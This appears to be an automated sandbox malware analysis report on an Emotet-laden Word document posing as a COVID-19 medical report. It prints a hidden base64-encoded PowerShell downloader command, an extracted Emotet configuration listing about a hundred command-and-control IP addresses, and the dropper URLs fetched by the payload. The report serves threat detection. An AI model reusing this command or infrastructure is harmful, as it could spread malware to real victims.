                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2296, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1, ProcessId: 2700
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAc

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://cab.mykfn.com/admin/X/Avira URL Cloud: Label: malware
                      Source: http://gocphongthe.com/wp-content/lMMC/Avira URL Cloud: Label: malware
                      Source: http://ie-best.net/online-timer-kvhxz/ilXL/Avira URL Cloud: Label: malware
                      Source: http://www.letscompareonline.com/de.letscompareonline.com/wYd/Avira URL Cloud: Label: malware
                      Source: http://bhaktivrind.com/cgi-bin/JBbb8/Avira URL Cloud: Label: malware
                      Source: http://vanddnabhargave.com/asset/W9o/Avira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 11.2.rundll32.exe.200000.1.unpackMalware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["69.38.130.14:80", "195.159.28.230:8080", "162.241.204.233:8080", "115.21.224.117:80", "78.189.148.42:80", "181.165.68.127:80", "78.188.225.105:80", "161.0.153.60:80", "89.106.251.163:80", "172.125.40.123:80", "5.39.91.110:7080", "110.145.11.73:80", "190.251.200.206:80", "144.217.7.207:7080", "75.109.111.18:80", "75.177.207.146:80", "139.59.60.244:8080", "70.183.211.3:80", "95.213.236.64:8080", "61.19.246.238:443", "174.118.202.24:443", "71.72.196.159:80", "138.68.87.218:443", "24.164.79.147:8080", "49.205.182.134:80", "24.231.88.85:80", "121.124.124.40:7080", "95.9.5.93:80", "118.83.154.64:443", "78.24.219.147:8080", "104.131.11.150:443", "85.105.205.77:8080", "108.53.88.101:443", "187.161.206.24:80", "203.153.216.189:7080", "37.187.72.193:8080", "185.94.252.104:443", "157.245.99.39:8080", "50.91.114.38:80", "87.106.139.101:8080", "74.128.121.17:80", "62.75.141.82:80", "37.139.21.175:8080", "190.103.228.24:80", "134.209.144.106:443", "78.182.254.231:80", "186.74.215.34:80", "180.222.161.85:80", "69.49.88.46:80", "202.134.4.211:8080", "75.113.193.72:80", "139.162.60.124:8080", "79.137.83.50:443", "123.176.25.234:80", "172.105.13.66:443", "93.146.48.84:80", "109.116.245.80:80", "41.185.28.84:8080", "98.109.133.80:80", "194.190.67.75:80", "110.145.101.66:443", "136.244.110.184:8080", "24.179.13.119:80", "89.216.122.92:80", "139.99.158.11:443", "172.86.188.251:8080", "74.40.205.197:443", "62.171.142.179:8080", "167.114.153.111:8080", "119.59.116.21:8080", "74.58.215.226:80", "188.165.214.98:8080", "172.104.97.173:8080", "197.211.245.21:80", "66.57.108.14:443", "188.219.31.12:80", "168.235.67.138:7080", "24.69.65.8:8080", "173.70.61.180:80", "110.142.236.207:80", "51.89.36.180:443", "46.105.131.79:8080", "194.4.58.192:7080", "220.245.198.194:80", "109.74.5.95:8080", "24.178.90.49:80", "181.171.209.241:443", "59.21.235.119:80", "94.23.237.171:443", "12.175.220.98:80", "217.20.166.178:7080", "50.116.111.59:8080", "176.111.60.55:8080", "200.116.145.225:443", "120.150.60.189:80", "185.201.9.197:8080", "202.134.4.216:8080", "120.150.218.241:443", "2.58.16.89:8080", "70.92.118.112:80", "74.208.45.104:8080", "79.130.130.240:8080", "190.240.194.77:443", "85.105.111.166:80", "115.94.207.99:443"]}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: vanddnabhargave.comVirustotal: Detection: 5%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dllMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dllReversingLabs: Detection: 93%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: IU-8549 Medical report COVID-19.docVirustotal: Detection: 63%Perma Link
                      Source: IU-8549 Medical report COVID-19.docMetadefender: Detection: 56%Perma Link
                      Source: IU-8549 Medical report COVID-19.docReversingLabs: Detection: 82%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dllJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: <ystem.pdb@) source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098556907.00000000027F0000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: cab.mykfn.com
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 166.62.28.130:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 166.62.28.130:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49171 -> 195.159.28.230:8080
                      Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49173 -> 162.241.204.233:8080
                      Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.22:49175 -> 115.21.224.117:80
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 69.38.130.14:80
                      Source: Malware configuration extractorIPs: 195.159.28.230:8080
                      Source: Malware configuration extractorIPs: 162.241.204.233:8080
                      Source: Malware configuration extractorIPs: 115.21.224.117:80
                      Source: Malware configuration extractorIPs: 78.189.148.42:80
                      Source: Malware configuration extractorIPs: 181.165.68.127:80
                      Source: Malware configuration extractorIPs: 78.188.225.105:80
                      Source: Malware configuration extractorIPs: 161.0.153.60:80
                      Source: Malware configuration extractorIPs: 89.106.251.163:80
                      Source: Malware configuration extractorIPs: 172.125.40.123:80
                      Source: Malware configuration extractorIPs: 5.39.91.110:7080
                      Source: Malware configuration extractorIPs: 110.145.11.73:80
                      Source: Malware configuration extractorIPs: 190.251.200.206:80
                      Source: Malware configuration extractorIPs: 144.217.7.207:7080
                      Source: Malware configuration extractorIPs: 75.109.111.18:80
                      Source: Malware configuration extractorIPs: 75.177.207.146:80
                      Source: Malware configuration extractorIPs: 139.59.60.244:8080
                      Source: Malware configuration extractorIPs: 70.183.211.3:80
                      Source: Malware configuration extractorIPs: 95.213.236.64:8080
                      Source: Malware configuration extractorIPs: 61.19.246.238:443
                      Source: Malware configuration extractorIPs: 174.118.202.24:443
                      Source: Malware configuration extractorIPs: 71.72.196.159:80
                      Source: Malware configuration extractorIPs: 138.68.87.218:443
                      Source: Malware configuration extractorIPs: 24.164.79.147:8080
                      Source: Malware configuration extractorIPs: 49.205.182.134:80
                      Source: Malware configuration extractorIPs: 24.231.88.85:80
                      Source: Malware configuration extractorIPs: 121.124.124.40:7080
                      Source: Malware configuration extractorIPs: 95.9.5.93:80
                      Source: Malware configuration extractorIPs: 118.83.154.64:443
                      Source: Malware configuration extractorIPs: 78.24.219.147:8080
                      Source: Malware configuration extractorIPs: 104.131.11.150:443
                      Source: Malware configuration extractorIPs: 85.105.205.77:8080
                      Source: Malware configuration extractorIPs: 108.53.88.101:443
                      Source: Malware configuration extractorIPs: 187.161.206.24:80
                      Source: Malware configuration extractorIPs: 203.153.216.189:7080
                      Source: Malware configuration extractorIPs: 37.187.72.193:8080
                      Source: Malware configuration extractorIPs: 185.94.252.104:443
                      Source: Malware configuration extractorIPs: 157.245.99.39:8080
                      Source: Malware configuration extractorIPs: 50.91.114.38:80
                      Source: Malware configuration extractorIPs: 87.106.139.101:8080
                      Source: Malware configuration extractorIPs: 74.128.121.17:80
                      Source: Malware configuration extractorIPs: 62.75.141.82:80
                      Source: Malware configuration extractorIPs: 37.139.21.175:8080
                      Source: Malware configuration extractorIPs: 190.103.228.24:80
                      Source: Malware configuration extractorIPs: 134.209.144.106:443
                      Source: Malware configuration extractorIPs: 78.182.254.231:80
                      Source: Malware configuration extractorIPs: 186.74.215.34:80
                      Source: Malware configuration extractorIPs: 180.222.161.85:80
                      Source: Malware configuration extractorIPs: 69.49.88.46:80
                      Source: Malware configuration extractorIPs: 202.134.4.211:8080
                      Source: Malware configuration extractorIPs: 75.113.193.72:80
                      Source: Malware configuration extractorIPs: 139.162.60.124:8080
                      Source: Malware configuration extractorIPs: 79.137.83.50:443
                      Source: Malware configuration extractorIPs: 123.176.25.234:80
                      Source: Malware configuration extractorIPs: 172.105.13.66:443
                      Source: Malware configuration extractorIPs: 93.146.48.84:80
                      Source: Malware configuration extractorIPs: 109.116.245.80:80
                      Source: Malware configuration extractorIPs: 41.185.28.84:8080
                      Source: Malware configuration extractorIPs: 98.109.133.80:80
                      Source: Malware configuration extractorIPs: 194.190.67.75:80
                      Source: Malware configuration extractorIPs: 110.145.101.66:443
                      Source: Malware configuration extractorIPs: 136.244.110.184:8080
                      Source: Malware configuration extractorIPs: 24.179.13.119:80
                      Source: Malware configuration extractorIPs: 89.216.122.92:80
                      Source: Malware configuration extractorIPs: 139.99.158.11:443
                      Source: Malware configuration extractorIPs: 172.86.188.251:8080
                      Source: Malware configuration extractorIPs: 74.40.205.197:443
                      Source: Malware configuration extractorIPs: 62.171.142.179:8080
                      Source: Malware configuration extractorIPs: 167.114.153.111:8080
                      Source: Malware configuration extractorIPs: 119.59.116.21:8080
                      Source: Malware configuration extractorIPs: 74.58.215.226:80
                      Source: Malware configuration extractorIPs: 188.165.214.98:8080
                      Source: Malware configuration extractorIPs: 172.104.97.173:8080
                      Source: Malware configuration extractorIPs: 197.211.245.21:80
                      Source: Malware configuration extractorIPs: 66.57.108.14:443
                      Source: Malware configuration extractorIPs: 188.219.31.12:80
                      Source: Malware configuration extractorIPs: 168.235.67.138:7080
                      Source: Malware configuration extractorIPs: 24.69.65.8:8080
                      Source: Malware configuration extractorIPs: 173.70.61.180:80
                      Source: Malware configuration extractorIPs: 110.142.236.207:80
                      Source: Malware configuration extractorIPs: 51.89.36.180:443
                      Source: Malware configuration extractorIPs: 46.105.131.79:8080
                      Source: Malware configuration extractorIPs: 194.4.58.192:7080
                      Source: Malware configuration extractorIPs: 220.245.198.194:80
                      Source: Malware configuration extractorIPs: 109.74.5.95:8080
                      Source: Malware configuration extractorIPs: 24.178.90.49:80
                      Source: Malware configuration extractorIPs: 181.171.209.241:443
                      Source: Malware configuration extractorIPs: 59.21.235.119:80
                      Source: Malware configuration extractorIPs: 94.23.237.171:443
                      Source: Malware configuration extractorIPs: 12.175.220.98:80
                      Source: Malware configuration extractorIPs: 217.20.166.178:7080
                      Source: Malware configuration extractorIPs: 50.116.111.59:8080
                      Source: Malware configuration extractorIPs: 176.111.60.55:8080
                      Source: Malware configuration extractorIPs: 200.116.145.225:443
                      Source: Malware configuration extractorIPs: 120.150.60.189:80
                      Source: Malware configuration extractorIPs: 185.201.9.197:8080
                      Source: Malware configuration extractorIPs: 202.134.4.216:8080
                      Source: Malware configuration extractorIPs: 120.150.218.241:443
                      Source: Malware configuration extractorIPs: 2.58.16.89:8080
                      Source: Malware configuration extractorIPs: 70.92.118.112:80
                      Source: Malware configuration extractorIPs: 74.208.45.104:8080
                      Source: Malware configuration extractorIPs: 79.130.130.240:8080
                      Source: Malware configuration extractorIPs: 190.240.194.77:443
                      Source: Malware configuration extractorIPs: 85.105.111.166:80
                      Source: Malware configuration extractorIPs: 115.94.207.99:443
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmpString found in memory: http://cab.mykfn.com/admin/X/!http://bhaktivrind.com/cgi-bin/JBbb8/!http://vanddnabhargave.com/asset/W9o/!http://ie-best.net/online-timer-kvhxz/ilXL/!http://gocphongthe.com/wp-content/lMMC/!http://www.letscompareonline.com/de.letscompareonline.com/wYd/!http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
                      Source: unknownNetwork traffic detected: IP country count 30
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.159.28.230:8080
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.241.204.233:8080
                      Source: global trafficHTTP traffic detected: GET /cgi-bin/JBbb8/ HTTP/1.1Host: bhaktivrind.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /asset/W9o/ HTTP/1.1Host: vanddnabhargave.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /online-timer-kvhxz/ilXL/ HTTP/1.1Host: ie-best.netConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
                      Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
                      Source: Joe Sandbox ViewASN Name: HOSTER-KZ HOSTER-KZ
                      Source: Joe Sandbox ViewASN Name: BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN
                      Source: Joe Sandbox ViewASN Name: TTNETTR TTNETTR
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.38.130.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.38.130.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.241.204.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.241.204.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.241.204.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.241.204.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.241.204.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.241.204.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.21.224.117
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.21.224.117
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4FD77F3-97C0-4A14-814E-1968BCE52029}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /cgi-bin/JBbb8/ HTTP/1.1Host: bhaktivrind.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /asset/W9o/ HTTP/1.1Host: vanddnabhargave.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /online-timer-kvhxz/ilXL/ HTTP/1.1Host: ie-best.netConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: cab.mykfn.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Feb 2021 21:56:45 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Length: 1699Keep-Alive: timeout=5Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 3
                      Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpString found in binary or memory: http://bhaktivrind.com
                      Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://bhaktivrind.com/cgi-bin/JBbb8/
